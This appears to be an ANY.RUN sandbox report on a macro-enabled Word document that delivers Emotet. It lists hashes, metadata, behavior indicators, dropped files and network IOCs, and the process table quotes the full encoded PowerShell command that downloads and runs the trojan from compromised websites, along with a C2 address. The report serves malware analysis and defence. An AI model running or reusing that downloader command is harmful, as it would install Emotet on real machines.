analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

I9oJJBZ2kerCM7M

Full analysis: https://app.any.run/tasks/12fea99c-caf0-49ff-8c40-c7f952baa1f1
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 20, 2020, 00:58:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Possimus., Author: Chlo Morel, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 19 21:10:00 2020, Last Saved Time/Date: Mon Oct 19 21:10:00 2020, Number of Pages: 1, Number of Words: 1688, Number of Characters: 9623, Security: 8
MD5:

1491EB6BA71C0E6CA53E656489A3A67F

SHA1:

026104712D9297AEE31F92BEF87B85F00E1EF2E9

SHA256:

17BCF85C3E8000D32DAECEDE094FEE54C474BC66AB96FAD5DBC428959EE0166B

SSDEEP:

3072:9iJivKie6B/w2yiWydwS4BXc9Sd+l4PJhERTM5/oKUQ2t1a3p16zybeRy9r:9iJiP/w2P4BXc9Sd+l4PJhERTM5/oKUu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • shunimpl.exe (PID: 2688)
      • Row8yn.exe (PID: 948)
    • Connects to CnC server

      • shunimpl.exe (PID: 2688)
    • Changes the autorun value in the registry

      • shunimpl.exe (PID: 2688)
    • EMOTET was detected

      • shunimpl.exe (PID: 2688)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • shunimpl.exe (PID: 2688)
    • Executable content was dropped or overwritten

      • Row8yn.exe (PID: 948)
      • POwersheLL.exe (PID: 2992)
    • Executed via WMI

      • POwersheLL.exe (PID: 2992)
      • Row8yn.exe (PID: 948)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 2992)
    • Starts itself from another location

      • Row8yn.exe (PID: 948)
    • PowerShell script executed

      • POwersheLL.exe (PID: 2992)
    • Connects to server without host name

      • shunimpl.exe (PID: 2688)
  • INFO

    • Reads settings of System Certificates

      • POwersheLL.exe (PID: 2992)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2388)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2388)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Possimus.
Subject: -
Author: Chloé Morel
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:10:19 20:10:00
ModifyDate: 2020:10:19 20:10:00
Pages: 1
Words: 1688
Characters: 9623
Security: Locked for annotations
Company: -
Lines: 80
Paragraphs: 22
CharCountWithSpaces: 11289
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe row8yn.exe #EMOTET shunimpl.exe

Process information

PID
CMD
Path
Indicators
Parent process
2388"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\I9oJJBZ2kerCM7M.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2992POwersheLL -ENCOD IAAgAHMAZQBUAC0AaQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABlADoAOABMAGkAIAAgACgAIABbAHQAWQBwAEUAXQAoACcAUwB5ACcAKwAnAFMAVAAnACsAJwBFACcAKwAnAE0AJwArACcALgBpAE8ALgBEAEkAJwArACcAUgBFAEMAdABvAFIAWQAnACkAIAAgACkAIAA7ACAAIAAgACAAcwBFAHQALQBpAHQARQBNACAAKAAiAFYAYQBSACIAKwAiAGkAIgArACIAQQAiACsAIgBCAGwAZQA6ADIAaABGAEwAIgArACIAcAAiACkAIAAoAFsAVABZAHAAZQBdACgAJwBzAFkAUwB0ACcAKwAnAGUAbQAuACcAKwAnAE4AZQBUAC4AUwBlAHIAVgAnACsAJwBpAGMAZQBQAG8AaQAnACsAJwBuAFQAJwArACcAbQBhAG4AQQBHAEUAcgAnACkAKQAgACAAOwAgAFMAdgAgACgAJwBrACcAKwAnAFIANwAnACkAIAAgACgAIABbAHQAWQBwAGUAXQAoACcAcwB5ACcAKwAnAHMAVAAnACsAJwBFAG0ALgBuAEUAdAAuAFMAZQBDAHUAcgBJACcAKwAnAHQAeQBQAFIAJwArACcAbwAnACsAJwBUAG8AYwBvAGwAJwArACcAVAAnACsAJwB5AHAARQAnACkAKQAgADsAJABOADYAMgBzAGkAbgB6AD0AKAAnAFgAJwArACcAbABuAHMAMABlAHkAJwApADsAJABZADIAYwBtAHEAZABrAD0AJABEADgANwAwADYAOQBjACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQAQQBnAGQAZQA0ADAAdwA7ACQAVwAxADQAdwBtADMAZgA9ACgAJwBLAHgAawBkAGgAXwAnACsAJwBzACcAKQA7ACAAIAAoAFYAYQBSAGkAYQBiAEwARQAgACAAOABsAGkAKQAuAFYAYQBsAFUAZQA6ADoAYwByAEUAYQBUAGUAZABpAFIAZQBjAHQATwBSAFkAKAAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACAAKwAgACgAKAAnAFcAWQBUAEQAZAAnACsAJwAwAGcAcAB2AHMAVwBZACcAKwAnAFQAVQBnAHUAbwBmAGIANwBXAFkAJwArACcAVAAnACkALgBSAGUAcABsAGEAQwBFACgAKABbAGMAaABhAHIAXQA4ADcAKwBbAGMAaABhAHIAXQA4ADkAKwBbAGMAaABhAHIAXQA4ADQAKQAsAFsAcwB0AHIAaQBuAGcAXQBbAGMAaABhAHIAXQA5ADIAKQApACkAOwAkAE4AOABrAGoAZgA5AHMAPQAoACcAVQA3AHMAYgBrACcAKwAnAHYAcwAnACkAOwAgACAAKABHAGUAdAAtAFYAQQBSAEkAYQBiAGwARQAgACAAKAAiADIAIgArACIASABmAEwAUAAiACkAIAAgAC0AdgBhAGwAdQBlAG8AbgBsAFkAIAApADoAOgBTAGUAQwBVAFIAaQB0AFkAcAByAG8AVABPAEMATwBMACAAPQAgACAAKABDAGgAaQBsAEQASQBUAGUATQAgACAAKAAiAHYAQQBSACIAKwAiAEkAYQBiACIAKwAiAGwAZQA6AEsAUgA3ACIAKQAgACkALgBWAGEATABVAGUAOgA6AHQAbABzADEAMgA7ACQAUwBxAHkAagBsAGMAawA9ACgAJwBUAGQAdQBoACcAKwAnAHgAXwAnACsAJwB4ACcAKQA7ACQATABzAHgANwBrAG0AbQAgAD0AIAAoACcAUgBvAHcAJwArACcAOAB5ACcAKwAnAG4AJwApADsAJABZAGgAaAA1AHEAawBkAD0AKAAnAFUAZQBtACcAKwAnAG4AMwBtAGkAJwApADsAJABMAHcAOQBzAGIAbgBsAD0AKAAnAFUAJwArACcAagByAG4AOABfACcAKwAnAHcAJwApADsAJABTAHAAawBiAGIANABkAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAGgARwB0AEQAZAAnACsAJwAwACcAKwAnAGcAcAB2AHMAJwArACcAaAAnACsAJwBHAHQAVQAnACsAJwBnAHUAbwBmACcAKwAnAGIANwBoAEcAdAAnACkALgByAGUAUABsAEEAQwBlACgAKABbAEMAaABBAHIAXQAxADAANAArAFsAQwBoAEEAcgBdADcAMQArAFsAQwBoAEEAcgBdADEAMQA2ACkALAAnAFwAJwApACkAKwAkAEwAcwB4ADcAawBtAG0AKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAEoAeQAxAGIAZABpADYAPQAoACcAUQAnACsAJwB3ACcAKwAnADIAYwBsAHcANwAnACkAOwAkAE0AagBqAGoANABwAGMAPQBuAGAARQBgAFcALQBvAGIASgBFAEMAVAAgAE4ARQB0AC4AdwBFAEIAYwBsAEkARQBuAFQAOwAkAEUAeABtAGcAXwA3AGoAPQAoACcAaAB0ACcAKwAnAHQAcABzADoALwAvAHkAaQAnACsAJwB4ACcAKwAnAHUAZQBjAG8AJwArACcAdQByAHMAZQAuAGMAJwArACcAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzACcAKwAnAC8AdwAnACsAJwBFAC8AKgBoAHQAJwArACcAdAAnACsAJwBwAHMAOgAvACcAKwAnAC8AZQBzAHQAJwArACcAeQBsAG8AaABvACcAKwAnAHUAcwBlAC4AYwBvACcAKwAnAG0ALwBwAG0AJwArACcAcwAvAGEAJwArACcAcABwAGwAJwArACcAaQAnACsAJwBjAGEAdABpACcAKwAnAG8AJwArACcAbgAvAGwAYQBuAGcAdQBhAGcAZQAvAGUAJwArACcALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAOgAvAC8AJwArACcANwA3AHcAaQBuAHMAJwArACcALgBjACcAKwAnAGwAdQAnACsAJwBiAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAnACsAJwAvADQAJwArACcAeQAvACoAaAB0AHQAcABzADoALwAvAGwAYQB5AGEAZwByACcAKwAnAG8AdQBwAC4AbgBlACcAKwAnAHQALwB3AHAALQBhAGQAbQAnACsAJwBpACcAKwAnAG4AJwArACcALwA1AGgALwAqACcAKwAnAGgAJwArACcAdAB0AHAAcwA6AC8ALwAnACsAJwB6ACcAKwAnAGkAbwBuAGkAbQAnACsAJwBtAGkAJwArACcAZwByAGEAdAAnACsAJwBpAG8AbgAuAGMAbwBtAC8AcwBjAHMAcwAnACsAJwAvAGIASAAnACsAJwBkAC8AKgAnACsAJwBoAHQAJwArACcAdABwAHMAOgAvAC8AdgBpACcAKwAnAHYAbwAnACsAJwBzACcAKwAnAGwAbwB0ACcAKwAnAHAAdQAnACsAJwBsAHMAYQAnACsAJwAuAGMAbwAnACsAJwBtAC8AdwAnACsAJwBwAC0AYwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnADEALwAnACsAJwAqAGgAdAB0AHAAcwA6AC8ALwAnACsAJwB3AGkAegB6AGQAbwBtAGgAdQBiAC4AYwBvAG0AJwArACcALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AJwArACcASQBaACcAKwAnAC8AJwApAC4AUwBQAGwASQB0ACgAJABMAGEAZgBrADIANgAzACAAKwAgACQAWQAyAGMAbQBxAGQAawAgACsAIAAkAFgAagBhAGgANAAxAHcAKQA7ACQATgBiAGEAZQB3AGcAawA9ACgAJwBVACcAKwAnADYANgBwAHcAaQAnACsAJwB4ACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBpAGMAbABqAGIAcQAgAGkAbgAgACQARQB4AG0AZwBfADcAagApAHsAdAByAHkAewAkAE0AagBqAGoANABwAGMALgBEAG8AdwBOAGwATwBBAEQARgBpAGwAZQAoACQAUQBpAGMAbABqAGIAcQAsACAAJABTAHAAawBiAGIANABkACkAOwAkAEoANAA4ADcANQBtAHQAPQAoACcAWAAnACsAJwBnAGYAJwArACcANgBpAHgAawAnACkAOwBJAGYAIAAoACgARwBgAEUAVAAtAEkAVABFAG0AIAAkAFMAcABrAGIAYgA0AGQAKQAuAEwARQBOAEcAVABoACAALQBnAGUAIAAzADgANQA5ADAAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAJwB3AGkAbgAzADIAJwArACcAXwAnACsAJwBQAHIAbwBjAGUAcwBzACcAKQApAC4AYwBSAGUAYQBUAGUAKAAkAFMAcABrAGIAYgA0AGQAKQA7ACQAWQB1AGsAdgAzAGQAagA9ACgAJwBZAHMANwBfACcAKwAnAG0AOQB5ACcAKQA7AGIAcgBlAGEAawA7ACQAVgA1AGEANQAxAF8AZwA9ACgAJwBOACcAKwAnAGgAcABiAHEAXwBlACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBwAHoAegBuAHcAdgA9ACgAJwBSAGcAJwArACcAOAA1ACcAKwAnAHgAdAB1ACcAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
948C:\Users\admin\Dd0gpvs\Uguofb7\Row8yn.exeC:\Users\admin\Dd0gpvs\Uguofb7\Row8yn.exe
wmiprvse.exe
User:
admin
Company:
T
Integrity Level:
MEDIUM
Description:
TODO: <File descri
Exit code:
0
Version:
1.0.0.1
2688"C:\Users\admin\AppData\Local\mfc40u\shunimpl.exe"C:\Users\admin\AppData\Local\mfc40u\shunimpl.exe
Row8yn.exe
User:
admin
Company:
T
Integrity Level:
MEDIUM
Description:
TODO: <File descri
Version:
1.0.0.1
Total events
2 097
Read events
1 201
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4C82.tmp.cvr
MD5:
SHA256:
2992POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O6EW0BQFEUX4Y469ICWT.temp
MD5:
SHA256:
2388WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A52A53F7F4A88A286A0B9FDB2AB08C18
SHA256:5FFBA69FC196B0B61D54F4EDFC4D3C764B2194BF7AC2BAF4F6F9CFEAF505975A
2388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:D3E83535553E7C8C2D72FA3038CE184F
SHA256:F184E729CE9EC71FE3DB2F59537A795689BEF28157ABA9BAE262ED270BBC29E2
2992POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:F17FB243611FC8D2B382ABB444B83A98
SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869
2992POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1259b1.TMPbinary
MD5:F17FB243611FC8D2B382ABB444B83A98
SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869
2388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$oJJBZ2kerCM7M.docpgc
MD5:535257B4487C9874F465DE9DE8D7E639
SHA256:5D1A7F176E987415B9E351DE02727B4CE498EAECF7D7099DA4C225153F76B75F
948Row8yn.exeC:\Users\admin\AppData\Local\mfc40u\shunimpl.exeexecutable
MD5:9C97D0267BC713D13183BF9541E610A0
SHA256:DD18CE54417E895858C498DA27FDAF337BE3E61A811EB0DF2FCCB03A9F7906F8
2992POwersheLL.exeC:\Users\admin\Dd0gpvs\Uguofb7\Row8yn.exeexecutable
MD5:9C97D0267BC713D13183BF9541E610A0
SHA256:DD18CE54417E895858C498DA27FDAF337BE3E61A811EB0DF2FCCB03A9F7906F8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2688
shunimpl.exe
POST
200
186.189.249.2:80
http://186.189.249.2/ZlpcU8mkc/R11eeHW1xwN39Oy/Zu4LxEGJugxtVn/8atQBr8jGupzfo60/
AR
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2688
shunimpl.exe
186.189.249.2:80
AR
malicious
2992
POwersheLL.exe
132.232.249.32:443
yixuecourse.com
LeaseWeb Netherlands B.V.
NL
unknown

DNS requests

Domain
IP
Reputation
yixuecourse.com
  • 132.232.249.32
unknown

Threats

PID
Process
Class
Message
2688
shunimpl.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
1 ETPRO signatures available at the full report
No debug info